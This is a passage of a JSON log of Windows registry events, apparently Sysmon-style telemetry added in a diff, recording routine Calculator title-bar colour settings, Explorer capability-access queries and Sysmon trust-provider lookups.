"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + 
"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + 
"timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": 
"Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + 
"event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": 
